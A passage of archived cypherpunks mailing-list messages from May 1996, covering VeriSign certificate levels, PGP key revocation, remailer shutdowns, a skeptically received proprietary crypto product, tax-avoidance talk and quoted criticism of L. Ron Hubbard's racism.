FhwYMB5NAsmeMwz2dqv+ZCvO7LID1tM7ez1rjHOVvC7aSQPSe1mF8ShaxYdSVtcP
ZqHhC145IiAZ715FZzHzjoCjfD0yHK/s
=aa0n
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Sat, 11 May 1996 10:15:26 +0800
To: unicorn@schloss.li (Black Unicorn)
Subject: Re: Why I Pay Too Much in Taxes
In-Reply-To: <Pine.SUN.3.93.960509133137.5395A-100000@polaris.mindport.net>
Message-ID: <199605101434.JAA19161@homeport.org>
MIME-Version: 1.0
Content-Type: text


	If it was a government sting operation the detials might be
easily found.  The kind of information we're discussing is clearly of
high value to a great many people in the 60% bracket.  Looking for it
for free...Well, you may get what you pay for.

	I think that there is a high amount of value in a high volume,
low overhead sort of tax avoidance operation.  Right now, moving money
overseas is expensive, and there is a high service fee.  Reducing the
up front costs that someone has to pay to get started is a market
opportunity.  As is producing accessible information about how to get
started.  While Unicorn may be correct in suggesting three or four
volumes of tax law to get started properly, thats like suggesting Bach
and Comer for someone who wants to get on the internet.  When it was
needed, there were far fewer people here.

	As to the obvious rejoinder of, 'as soon as its obvious, its
illegal,' if enough people start to do it, theres a large lobby for
keeping it legal.  And if the overhead is low, all of those people
have lots of money to spend keeping it legal and cheap.

Adam


Black Unicorn wrote:

| On Thu, 9 May 1996, Robin Powell wrote:
| 
| > >>>>> Black Unicorn <unicorn@schloss.li> writes:
| > 
| >     >> By the way, are there any PGP encrypted mailing lists for
| >     >> discussing serious tax fraud?
| > 
| >     > If such a list existed, would we tell an anonymous poster/fed?
| > 
| > Well, if such a list does exist, I would like to know about it.
| > 
| > -Robin
| > 
| 
| Again, in the absence of any credentials or recommendation, I can't see
| how the moderators/originators/managers of such a list would disclose the
| details of its publication.
| 
| ---
| My preferred and soon to be permanent e-mail address:unicorn@schloss.li
| "In fact, had Bancroft not existed,       potestas scientiae in usu est
| Franklin might have had to invent him."    in nihilum nil posse reverti
| 00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
| Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com
| 


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Byrd <byrd@acm.org>
Date: Sat, 11 May 1996 09:35:10 +0800
To: cypherpunks@toad.com
Subject: Re: remailer@utopia.hacktic.nl down
Message-ID: <2.2.32.19960510135123.006a4d98@tiac.net>
MIME-Version: 1.0
Content-Type: text/plain


At 07:15 PM 5/9/96 -0700, qut@netcom.com (Dave Harman) wrote:
>
>Oh, in what way was Elrom racist? (he's not anti-asian or anti-semitic,
>for instance)
>
One famous comment of L. Ron Hubbard was that blacks were too stupid to move
the needle on the e-meter.

Another comment was that the problem with China is that there are too many
"chinks" in it.

All this, and much more, is documented in "A Piece of Blue Sky" by John
Atack (and in other places).





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: MOHAMED HABIB MOHAMED EUSOFF <HABIB@KLSE.COM.MY>
Date: Sat, 11 May 1996 07:09:52 +0800
To: cypherpunks@toad.com
Subject: Dear friends,
Message-ID: <s1931915.069@KLSE.COM.MY>
MIME-Version: 1.0
Content-Type: text/plain


Dear friends,

I am searching for NETWORK SECURITY white paper, documents and hacking uitlities. Maybe you guys/gals can
shed some light on this.

TQ.
See You.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Burroughs <richieb@teleport.com>
Date: Sat, 11 May 1996 11:36:37 +0800
To: cypherpunks@toad.com
Subject: Re: remailer@utopia.hacktic.nl down
Message-ID: <2.2.32.19960510171253.00760f44@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:15 PM 5/9/96 -0700, qut@netcom.com (Dave Harman) wrote:
[snip]
>Oh, in what way was Elrom racist? (he's not anti-asian or anti-semitic,
>for instance)
[snip]

Chris Owen has written an essay about Hubbard's support of the racist South
African govt.  

http://www.demon.co.uk/castle/audit/aprtheid.html

He quotes Hubbard as writing:

"Just as individuals can be seen by observing nations, so we see the African
tribesman, with his complete contempt for truth and his emphasis on
brutality and savagery for others but not himself, is a no-civilization." 


Rich

______________________________________________________________________
Rich Burroughs  richieb@teleport.com  http://www.teleport.com/~richieb
See my Blue Ribbon Page at http://www.teleport.com/~richieb/blueribbon
New EF zine "cause for alarm" - http://www.teleport.com/~richieb/cause





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: timd@consensus.com (Tim Dierks)
Date: Sat, 11 May 1996 10:39:10 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: PGP, Inc.
Message-ID: <v02140b03adb92b2dbc65@[205.149.165.24]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:10 PM 5/9/96, E. ALLEN SMITH wrote:
>From:   IN%"shamrock@netcom.com"  9-MAY-1996 23:02:01.67
>
>>At 19:37 5/9/96, E. ALLEN SMITH wrote:
>>>        I can see some fascinating legal questions with what, exactly, a
>>>VeriSign certificate obligates the company for. Digital signature laws should
>>>get interesting - any application of this to the Utah one?
>
>>VeriSign is going to offer four levels of certs. The first requires only
>>uniqueness. For the other three levels, VeriSign will require more and
>>better assurances of the correctness of True Name stated on the cert. I
>>don't know what form these assurances are supposed to take.
>
>    The first level, in other words, is less of a certification than a PGP
>key with self-signature and signature from one other person. It doesn't have
>_any_ effort to verify that the email address stated on it is the actual email
>address of that nym. Or am I misinterpreting you?

The only effort they make is that when using the email-based CA, it mails
the certificate to the address within, so it's not trivial to get a cert
for an address that you don't have access to. (I'm not saying it's
impossible, or even hard, just that it requires some skill and effort).

 - Tim

Tim Dierks  --  timd@consensus.com  --  www.consensus.com
Head of Thing-u-ma-jig Engineering, Consensus Development






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Dave Harman)
Date: Sat, 11 May 1996 10:16:54 +0800
To: byrd@ACM.ORG (Jim Byrd)
Subject: Re: remailer@utopia.hacktic.nl down
In-Reply-To: <2.2.32.19960510135123.006a4d98@tiac.net>
Message-ID: <199605101725.KAA04013@netcom16.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> At 07:15 PM 5/9/96 -0700, qut@netcom.com (Dave Harman) wrote:
> >
> >Oh, in what way was Elrom racist? (he's not anti-asian or anti-semitic,
> >for instance)
> >
> One famous comment of L. Ron Hubbard was that blacks were too stupid to move
> the needle on the e-meter.

Translation: He couldn't find enough blacks
willing to part with enough money.

> Another comment was that the problem with China is that there are too many
> "chinks" in it.

China's protectionist trade policy forbid investment by Co$.
Otherwise, he would have praised the chinese for servility.

> All this, and much more, is documented in "A Piece of Blue Sky" by John
> Atack (and in other places).

No racism, just capitali$m and its value system.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bert-Jaap Koops" <E.J.Koops@kub.nl>
Date: Sat, 11 May 1996 04:26:30 +0800
To: cypherpunks@toad.com
Subject: Crypto Law Survey - updated
Message-ID: <D3A215E4528@frw3.kub.nl>
MIME-Version: 1.0
Content-Type: text/plain


I have just updated my survey of cryptography regulations worldwide.
I have included the developments of the past few months and added a
number of links to more detailed resources and full texts.

http://cwis.kub.nl/~frw/people/koops/lawsurvy.htm

Please reset old pointers to this URL.
Comments, as always, will be appreciated.

Bert-Jaap Koops
---------------------------------------------------------------------
Bert-Jaap Koops                         tel     +31 13 466 8101
Center for Law and Informatization      facs    +31 13 466 8102
Tilburg University                      e-mail  E.J.Koops@kub.nl
                  --------------------------------------------------
Postbus 90153    |  This world's just mad enough to have been made  |
5000 LE Tilburg  |    by the Being his beings into being prayed.    |
The Netherlands  |                (Howard Nemerov)                  |
---------------------------------------------------------------------
         http://cwis.kub.nl/~frw/people/koops/bertjaap.htm
---------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "CRYPTO" <crypto@nas.edu>
Date: Sat, 11 May 1996 09:51:10 +0800
To: alert@washofc.cpsr.org
Subject: The National Research Council Study of National...
Message-ID: <9604108317.AA831753761@nas.edu>
MIME-Version: 1.0
Content-Type: text/plain


Subject:
The National Research Council Study of National Cryptography Policy

  Please post this message widely

  I am writing to let interested parties know about the imminent release
  of the NRC's study of national cryptography policy.  If
  all goes well, we hope to release it on May 30, 1996.
  However, prior to that time, we won't be able to comment on
  its contents.

  For current information on release, visit the web site
  http://www2.nas.edu/cstbweb/220a.html

  When you visit that site, you'll have the opportunity to
  be put onto a mailing list so that we can inform you by e-mail
  when the report is available in print and/or electronically, as well
  as any public events associated with the report (e.g., public
  briefings).

  Herb Lin
  Cryptography Policy Study Director
  Computer Science and Telecommunications Board
  National Academy of Sciences/National Research Council
  202-334-2605





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Sat, 11 May 1996 09:50:05 +0800
To: EALLENSMITH@ocelot.Rutgers.EDU (E. ALLEN SMITH)
Subject: Re: PGP, Inc.
In-Reply-To: <01I4IPAJCSGG8Y5AJT@mbcl.rutgers.edu>
Message-ID: <199605101639.LAA19438@homeport.org>
MIME-Version: 1.0
Content-Type: text


They claim to make an effort that the email address is unique, and
that Verisign!!'s shamrock@netcom.com will only be issued once.

Adam


E. ALLEN SMITH wrote:
| 
| 
| From:	IN%"shamrock@netcom.com"  9-MAY-1996 23:02:01.67
| 
| >At 19:37 5/9/96, E. ALLEN SMITH wrote:
| >>        I can see some fascinating legal questions with what, exactly, a
| >>VeriSign certificate obligates the company for. Digital signature laws should
| >>get interesting - any application of this to the Utah one?
| 
| >VeriSign is going to offer four levels of certs. The first requires only
| >uniqueness. For the other three levels, VeriSign will require more and
| >better assurances of the correctness of True Name stated on the cert. I
| >don't know what form these assurances are supposed to take.
| 
| 	The first level, in other words, is less of a certification than a PGP
| key with self-signature and signature from one other person. It doesn't have
| _any_ effort to verify that the email address stated on it is the actual email
| address of that nym. Or am I misinterpreting you?
| 	-Allen
| 


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Reid <root@edmweb.com>
Date: Sat, 11 May 1996 12:45:09 +0800
To: Ray Arachelian <sunder@dorsai.dorsai.org>
Subject: Re: Transitive trust
In-Reply-To: <Pine.SUN.3.91.960509213411.632B-100000@dorsai>
Message-ID: <Pine.BSF.3.91.960510123153.165C-100000@bitbucket.edmweb.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> > affected. Clearly, it should be possible to remove your signature from 
> > someone's key.

> But it is - it's a pain in the ass, but you can always revoke your own 
> key and generate a new one, then sign everyone's keys whom you've signed 
> as trusted, EXCEPT the one you wish to revoke.

PITA, indeed... Not only do you have to re-sign everyone's keys, you also
have to have your key re-signed. When simply changing keys (eg. for a
larger keysize) it's usually sufficent to sign your new key with your old
one, but if you're revoking your old key, the signature won't really mean
anything. I suppose you could sign a message with your old key, saying
"I'm switching keys, here is my new key, please sign it.", and after you
have some signatures on the new key, revoke the old key.
 
> > What it all comes down to is reputation. Protect your reputation, and 
> > you could make a living on your reputation alone.

> Ah, but first you have to build yourself a reputation before you can live
> off it alone.  :) That includes doing cool things other than building
> reputations by signing keys.

I agree, but in the context of key signing, your key signing reputation is
all that really matters. I would accept a key signed by Bozo the Clown, if
Bozo did the proper research into the keys he signs and has never signed a
bogus key. Of course, being well-known for other reasons would help people
to remember your name. :)

======================================================================
| Steve Reid - SysAdmin & Pres, EDM Web (http://www.edmweb.com/)     |
| Email: steve@edmweb.com   Home Page: http://www.edmweb.com/steve/  |
| PGP (2048/9F317269) Fingerprint: 11C89D1CD67287E6 8C09EC52443F8830 |
|                -- Disclaimer: JMHO, YMMV, IANAL. --                |
====================================================================:)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: noconv

iQEVAwUBMZLVpdtVWdufMXJpAQHrsgf/d2SiWQ1rDdduGlQc0zUPGIa05E4RTTZ5
ixX3h5bMU6ZARtJByRLsg0pof8quWA9AaE3FDgMPrN/5nejvKEMwY6OE6XpPGOxw
YbQD5+DRYNiQ7jAxIkF3eASbta9E2VbuKdEDAi6fMUS6gGQSlLeRnMT6Vn+YWQHX
Nbc9yIgx086+w0T8vED9AhKL0DK8sQdKNYV6OXnhw8O0WmADMxj5tox7W3i/9ygP
GdouA9iEKt1i00z0s/fQnxxGf45SYKD7pwGEGnQ9zXkQ34NVCo2f0Ge0F7aAkK/2
OZlAVQYLTs82Skmt+dU3wr2vsfmI+qPukakoyk1JoDP2OkZ+oqY89Q==
=74c6
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Sat, 11 May 1996 14:06:17 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: PGP, Inc.
In-Reply-To: <01I4IPAJCSGG8Y5AJT@mbcl.rutgers.edu>
Message-ID: <9605101850.AA01792@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


>  	The first level, in other words, is less of a
>  certification than a PGP key with self-signature and
>  signature from one other person. It doesn't have _any_ effort
>  to verify that the email address stated on it is the actual
>  email address of that nym. Or am I misinterpreting you?

All the first level cert means, and nothing more, is "The name associated  
with this key is unique among the first level keys certified by Verisign."   
No effort is made to 'verify' the name.  If you register your pseudonym with  
all of the high-profile CA's that allow it, before you first use the nym, it  
becomes much harder to spoof your nym's key.  Assuming, of course, that it is  
customary for nym's to get their keys certified and for people to check  
them.

Bill Stewart, I believe, informally operates a CA that will sign unique nyms keys.


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Corbet <corbet@stout.atd.ucar.edu>
Date: Sat, 11 May 1996 11:31:53 +0800
To: cypherpunks@toad.com
Subject: True Names
Message-ID: <199605102012.OAA13961@atd.atd.ucar.EDU>
MIME-Version: 1.0
Content-Type: text/plain


I was wandering around in Amazon Books, http://www.amazon.com/, when I
stumbled across an interesting entry for Vernor Vinge: "True Names: And the
Opening of the Cyberspace Frontier".  It's due out in August.  It would
appear that True Names is finally being reissued?  Since I've never been
able to get my hands on a copy of True Names to read, I would be pleased by
this.  Anybody know any more?

jon

Jonathan Corbet
National Center for Atmospheric Research, Atmospheric Technology Division
corbet@stout.atd.ucar.edu	     http://www.atd.ucar.edu/rdp/jmc.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sat, 11 May 1996 11:05:07 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Why I Pay Too Much in Taxes
Message-ID: <2.2.32.19960510184531.0073678c@popserver.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:32 PM 5/9/96 -0400, Black Unicorn wrote:
>>     >> By the way, are there any PGP encrypted mailing lists for
>>     >> discussing serious tax fraud?
>> 
>>     > If such a list existed, would we tell an anonymous poster/fed?
>> 
>> Well, if such a list does exist, I would like to know about it.
>> 
>> -Robin
>> 
>
>Again, in the absence of any credentials or recommendation, I can't see
>how the moderators/originators/managers of such a list would disclose the
>details of its publication.

Such a list could be published openly in any case since discussing
techniques of tax fraud is legal.  Even advocay would be legal in almost all
cases.  (Since tax fraud is a non-violent crime, you don't have any of these
'agitating an angry mob' scenarios.)  As long as you avoided conspiring with
anyone, you can discuss techniques all you like.  Some *participants* might
like to subscribe anonymously however.

DCF






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark O. Aldrich" <maldrich@grci.com>
Date: Sat, 11 May 1996 11:34:42 +0800
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Free demo disk of "distorted number" crypto
Message-ID: <Pine.SCO.3.91.960510143928.21944A-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain


C'punks:

I got a call from a group in Maryland called "Marketing Technologies,
Inc."  They are starting to distribute free demo copies of a new crypto
technology created by "Blackstar, Inc."  The crypto product, called
"Supercrypt," is based upon "distorted number generation."  This does not
appear to be the product sold under the same name by Computer Elektronik
Infosys.  Naturally, I enquired as to where the algorithms had been
published in the technical literature, but the sales rep indicated that,
while copyrighted, Blackstar does not yet hold a patent so they are
concerned about releasing the details.  She described the product as using
a "proprietary" algorithm. 

If you'd like to get a demo copy of the software, call Marketing 
Technologies at 301.588.1971.  You'll probably be speaking with Linda 
Greenwald, who's got _some_ information available, but not anything that's 
technical.  They are also offering a technical write-up via fax-back at 
301.588.2162.

Note that I'm not endorsing this product, I'm just relaying information 
that may be of interest.  If anything, you can get a copy of a new toy to 
muck with in your spare(?) time.  No, they are not yet on the Internet.

I'll relay my experiences with the product after I get it.

------------------------------------------------------------------------- 
|      Liberty is truly dead              |Mark Aldrich                 | 
|    when the slaves are willing          |GRCI INFOSEC Engineering     | 
|     to forge their own chains.          |maldrich@grci.com            | 
|        STOP THE CDA NOW!                |MAldrich@dockmaster.ncsc.mil | 
|_______________________________________________________________________| 
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     | 
|         and my employer gets no credit for them whatsoever.           | 
-------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sat, 11 May 1996 09:57:44 +0800
To: cypherpunks@toad.com
Subject: REF_orm
Message-ID: <199605101512.PAA03049@pipe2.t2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   5-10-96. WaPo:

   "House Panel Approves Intelligence Reforms."

   Reports on the House intelligence committee's differences
   with the Senate and White House reforms. Also, it reports
   on Freeh's testimony yesterday at a hearing about the need
   for new federal laws to protect against economic espionage.
   He cites spying by 23 foreign governments and methods used.

   REF_orm

   -----

   Note: Pipeline is suffering "technological" growing pains
   at PSI's VA switches, so they say (or maybe plummeting
   stock and insider dumps): incoming and outgoing mail oft
   delayed up to 24+.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sat, 11 May 1996 09:41:03 +0800
To: cypherpunks@toad.com
Subject: PTO_lop
Message-ID: <199605101513.PAA03205@pipe2.t2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   5-10-96. WaPo:

   "Copyright Comes to the Internet. IBM's 'Cryptolope'
   Technology Collects the Fees."

   Describes IBM's InfoMarket system for secure electronic
   payments and copyright protection through use of keys to
   gain access to documents.

   PTO_lop

   -----

   Note: Pipeline is suffering "technological" growing pains
   at PSI's VA switches, so they say (or maybe plummeting
   stock and insider dumps): incoming and outgoing mail oft
   delayed up to 24+.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Simmons <jsimmons@goblin.punk.net>
Date: Sat, 11 May 1996 13:53:42 +0800
To: cypherpunks@toad.com
Subject: Hacktic remailer shutdown
Message-ID: <199605102223.PAA22489@goblin.punk.net>
MIME-Version: 1.0
Content-Type: text/plain


Is there any information available on why the Hacktic remailer was shut
down?

-- 
Jeff Simmons                     "You guys, I don't hear any noise.
jsimmons@goblin.punk.net          Are you sure you're doing it right?"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sat, 11 May 1996 14:13:01 +0800
To: "E. ALLEN SMITH" <loki@obscura.com
Subject: Re: Remailer in a box
Message-ID: <2.2.32.19960510192405.0074a060@popserver.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:25 PM 5/9/96 EDT, E. ALLEN SMITH wrote:
>	Thanks.
>	Incidentally, one thing that I noticed in your listing of services
>was email to fax. In some circumstances (such as anonymous accounts), the other
>way around would be useful. Even for a non-anonymous account, there have been
>times when I've wished I could give someone a FAX number and have it emailed.

Already online in NYC, London, etc.  See http://www.jfax.co.uk/.  Faxes are
forwarded via Mime.  Cheap.  Also someone else offering fax and voicemail
over the web in Atlanta but I lost that URL.  Others should follow.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 11 May 1996 15:25:27 +0800
To: Lucky Green <shamrock@netcom.com>
Subject: Re: PGP, Inc.
In-Reply-To: <v02120d09adb880179541@[192.0.2.1]>
Message-ID: <Pine.GUL.3.93.960510152222.2815B-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


[Actually talking about VeriSign certs]

On Thu, 9 May 1996, Lucky Green wrote:

> At 23:10 5/9/96, E. ALLEN SMITH wrote:
> 
>>        The first level, in other words, is less of a certification than a
>>PGP key with self-signature and signature from one other person. It
>>doesn't have _any_ effort to verify that the email address stated on it
>>is the actual email address of that nym. Or am I misinterpreting you?

For the first level, this is correct. I didn't even see an AUP
discouraging spoofing.

> I was on a panel with a representative from VeriSign at Interop in Las
> Vegas. He said that uniqueness was the only requirement for the first level
> of cert. I don't have any information beyond that.

Just visit www.verisign.com with the Netscape 3.x beta and see.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andre Bacard <abacard@well.com>
Date: Sat, 11 May 1996 13:40:29 +0800
To: cypherpunks@toad.com
Subject: Bill Frantz, Churchill Club, Privacy
Message-ID: <199605102242.PAA06840@well.com>
MIME-Version: 1.0
Content-Type: text/plain


 
Bill Frantz wrote an excellent review of the recent "Churchill Club: 20th
Anniversary of Public Key Crypto" dinner & forum at the San Francisco
Airport Marriott Hotel, an event which I attended.
 
Bill's summary particularly caught my attention:
 
      Impressions:  In conversation afterwards, I noted that discussion
      of personal privacy seemed to be politically incorrect in this
      group.  Unless it directly supported corporate commerce, we didn't
      discuss it.
 
It's worth noting that "privacy" and "security" -- in the practical Big
Brother and corporate worlds -- are often opposites. In many instances, 
(personal) "privacy" shields individuals from organizations; whereas,
"security" protects organizations from individuals. For example, when a
corporation proudly announces that it has installed greater "security,"
it invariably means that the corporation has stepped up ways to spy upon
employees. For obvious reasons, it is "politically incorrect" to discuss
these issues in many quarters of society.
 
See you in the future,
Andre Bacard
======================================================================
abacard@well.com                    Bacard wrote "The Computer Privacy
Stanford, California                Handbook" [Intro by Mitchell Kapor].
"Playboy" Interview (See Below)     Published by Peachpit Press, (800)
http://www.well.com/user/abacard    283-9444, ISBN # 1-56609-171-3.
=======================================================================
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sat, 11 May 1996 15:17:09 +0800
To: brian dodds <cypherpunks@toad.com
Subject: Re: will the real Irving J. Schlublutz please stand up? was: Senator Leahy's Public Key
Message-ID: <2.2.32.19960510225842.006e1618@popmail.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                       SANDY SANDFORT
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

C'punks,

>On Thu, 9 May 1996, Timothy C. May wrote:

>i think a related point is one we all know well, that being if there is a
>will, there is a way.. we've seen it with phoney physicians and
>specialists, even, with certificates and physicians' licenses.. if someone
>wants to intercept corespondence and impersonate another person, it is
>easy enough if that person has the time and impetus.. 

When I was a teenager I read /The Great Impostor/, the 
autobiography of Fred Demara(sp?).  It was an eye-opener.
Demara posed as all sorts of people.  He didn't read any
books on the subject of identity, he just invented his own
techniques.  Because he was always learning, he was always
getting caught.  Each failure, however, just made his next
effort that much better.  Read it if you can find it; it's
facinating.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 11 May 1996 14:25:45 +0800
To: "E. ALLEN SMITH" <cypherpunks@toad.com
Subject: Re: Edited Edupage, 9 May 1996
Message-ID: <199605102309.QAA13309@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:08 PM 5/9/96 EDT, E. ALLEN SMITH wrote:
>From:	IN%"educom@elanor.oit.unc.edu"  9-MAY-1996 22:01:14.77
>
>>REGIONAL BELLS WANT RATE HIKES FOR WIRING SCHOOLS
>>The United States Telephone Association would like to raise the average U.S.
>>monthly phone bill by about $10 over the next five years to pay for wiring
>>schools and libraries with new lines for phones and computers, and to
>>subsidize poor and rural customers.  The proposal assumes an $11 billion
>>cost for wiring schools and libraries, with local phone companies paying
>>about a third to a half of that.  The rest would come from a surcharge on
>>other services, such as cellular.  "No single industry should be held
>>responsible for fulfilling this major goal," says USTA's president.  "Each
>>has a role and should make a significant contribution to the national
>>education technology mandate."  (Investor's Business Daily 8 May 96 A7)
>
>	The "subsidize poor and rural customers" line makes me glad I don't
>have a phone line.

As might be expected, the math on this just doesn't seem to work out.  If we 
assume that the average school has 500 students, and 1/2 of the 
telephone-using households have at least one kid in school (on average) then 
1000 telephone households at $120 extra per year, or $120,000 per school, is 
available to wire it.  That's a HELL of a lot of wire!!!  And that's just 
for a single year.   Why not just teach a few high school students wiring, 
pay them 2x the minimum wage, and give them a good summer job doing the wiring?


As for subsidizing rural customers...  Why not just install a cellular 
telephone site in an area that's too dispersed for efficient wireline 
telephones?  And most of these people are probably already in an area served by cellular.  

 

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 11 May 1996 12:01:36 +0800
To: "Mark O. Aldrich" <maldrich@grci.com>
Subject: Re: Free demo disk of "distorted number" crypto
In-Reply-To: <Pine.SCO.3.91.960510143928.21944A-100000@grctechs.va.grci.com>
Message-ID: <199605102015.QAA04435@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"Mark O. Aldrich" writes:
> technology created by "Blackstar, Inc."  The crypto product, called
> "Supercrypt," is based upon "distorted number generation."

My shock-proof bull detector is starting to beep. Its sometimes wrong,
but its right more often...

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: corey@hedgehog.mcom.com (Corey Bridges)
Date: Sat, 11 May 1996 14:30:52 +0800
To: cypherpunks@toad.com
Subject: C'punks on c|net
Message-ID: <2.2.32.19960510232453.00c7a678@pdmail2.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I haven't been able to plow through the C'punks mail in a while, so I don't
know if the small news broke that I mentioned this list on TV.

For what it's worth, here's what happened:

At the c|net Awards for Internet Excellence last week, Netscape won for best
server. David Pann (marketing), Mike McCool (engineering), and I
(documentation/user interface) accepted on behalf of the company. We each
got a chance to make acceptance speeches. (It was tres Academy Awards.) My
speech was as follows:

"I'll keep this short. I'd like to thank the Cypherpunks for their eternal
vigilance."

Which was received by the audience with a collective gasp.

The live event was simulcast on the Web, and the TV version was shown over
the weekend on the TV show "c|net Central."

Corey Bridges
Netscape Communications Corporation
http://home.netscape.com/people/corey
415-937-2978  (New number!)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark O. Aldrich" <maldrich@grci.com>
Date: Sat, 11 May 1996 12:43:58 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: Free demo disk of "distorted number" crypto
In-Reply-To: <199605102015.QAA04435@jekyll.piermont.com>
Message-ID: <Pine.SCO.3.91.960510163851.22278A-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 10 May 1996, Perry E. Metzger wrote:

> 
> "Mark O. Aldrich" writes:
> > technology created by "Blackstar, Inc."  The crypto product, called
> > "Supercrypt," is based upon "distorted number generation."
> 
> My shock-proof bull detector is starting to beep. Its sometimes wrong,
> but its right more often...

Yeah, I know.  Mine went off when I got the voice mail.  But, I'll give 
'em the benefit of the doubt (for the time being).  Apparently, Blackstar 
is one guy and he's been working on this for a couple of years.  He could 
be misguided or he could be the next Whitfield Diffie, who knows.  Crypto 
breakthroughs have to come from _someone_, and they aren't always 
necessarily the dudes in the think tanks and universities.  We'll see 
what shows up in the mail.

------------------------------------------------------------------------- 
|      Liberty is truly dead              |Mark Aldrich                 | 
|    when the slaves are willing          |GRCI INFOSEC Engineering     | 
|     to forge their own chains.          |maldrich@grci.com            | 
|        STOP THE CDA NOW!                |MAldrich@dockmaster.ncsc.mil | 
|_______________________________________________________________________| 
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     | 
|         and my employer gets no credit for them whatsoever.           | 
-------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: brian dodds <bdodds@jyacc.com>
Date: Sat, 11 May 1996 12:50:09 +0800
To: uunet!toad.com!cypherpunks@jyacc.com
Subject: will the real Irving J. Schlublutz please stand up? was: Senator Leahy's Public Key
In-Reply-To: <adb6e40b00021004fa1d@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.960510162738.7538H-100000@aspen>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 9 May 1996, Timothy C. May wrote:

> My point in all this being that "proofs of identity" aren't all they're
> cracked up to be.

i think a related point is one we all know well, that being if there is a
will, there is a way.. we've seen it with phoney physicians and
specialists, even, with certificates and physicians' licenses.. if someone
wants to intercept corespondence and impersonate another person, it is
easy enough if that person has the time and impetus.. 

by the way, hi to everyone, as this is my first post (and admittedly low 
in interesting content).. 

				bri..

--bdodds@jyacc.com
brian dodds, systems administration, jyacc, inc. wellesley, ma 
--617.431.7431x125
